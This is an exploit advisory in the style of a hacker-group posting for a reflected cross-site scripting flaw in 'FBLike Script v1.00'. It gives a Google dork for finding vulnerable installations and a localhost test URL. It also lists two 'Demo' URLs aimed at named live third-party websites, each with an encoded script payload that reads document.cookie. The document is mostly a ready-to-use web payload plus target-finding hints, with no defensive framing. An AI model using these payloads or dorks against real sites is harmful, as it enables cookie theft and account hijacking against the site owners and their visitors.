# Exploit Title: FBLike Script Cross Site Scripting
# Google Dork: Copyright © 2010 FBLike Script
# Date: 25/03/2012 1:53 PM #EST
# Author: Crim3R
# software Link : http://zumset.com/product/fbilike_script_v100.html
# Version: v1.00
# Tested on: all
# CVE : XSS
========================================
The xss is in like.php
http://127.0.0.1/fbilike/like.php?id=">
========================================
Demo:
http://www.talkgold.com/bans/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ilikenigeria.com/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

thanks to : H3X - Einstein - thE_Knight - Naboodgar - C0NS74NTINE - Cruel - S.a.S - Net.Plus - Mehdi.H4ckCity - 2MzRp - Mikili - iC0der - farbodmahini - M.Prince - IrIst -
==============Crim3R=====================
All SST&HC Members